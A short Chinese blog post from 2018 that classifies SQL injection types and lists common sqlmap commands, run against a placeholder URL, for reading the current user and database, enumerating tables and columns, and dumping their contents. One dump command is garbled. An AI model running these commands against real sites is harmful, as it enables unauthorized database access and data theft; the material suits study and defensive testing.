SQL注入

作者: 豆豆_50dd | 来源:发表于2018-04-24 13:08 被阅读0次

    SQL分类:

    1. 按照数据类型分类:
      >整形注入
      >字符型注入
    2. 按照注入语法分类
    >UNION query SQL injection(可联合查询注入)
    >Error-based SQL injection(报错型注入)
    > Boolean-based blind SQL injection(布尔型注入)
    >Time-based blind SQL injection(基于时间延迟注入)
    >Stacked queries SQL injection (可多语句查询注入0)
    
    1. 按照数据提交方式分类
      > post
      > get
      > cookie
    2. 按照数据库类型分类
      > php+mysql
      > asp+access
      > asp+ orecal
      SQLMAP常用命令:
    #获取当前用户名称:
    sqlmap.py -u "http://xx.com/new?id=1" --current-user
    #获取当前数据库名称:
    sqlmap.py -u "http://xx.com/new?id=1" --current-db
    #列表名:
    sqlmap.py -u "http://xx.com/new?id=1" --tables -D “db_name”
    #列字段:
    sqlmap.py -u "http://xx.com/new?id=1" --columns -T "tablename" -D "db_name"
    #获取字段内容:
    sqlmap.py -u "http://xx.com/new?id=1" --current-dbtablename" --dump -C "column_name" -T "tablename" -D "db-name"
    

    相关文章

      网友评论

          本文标题:SQL注入

          本文链接:https://www.haomeiwen.com/subject/pgtjlftx.html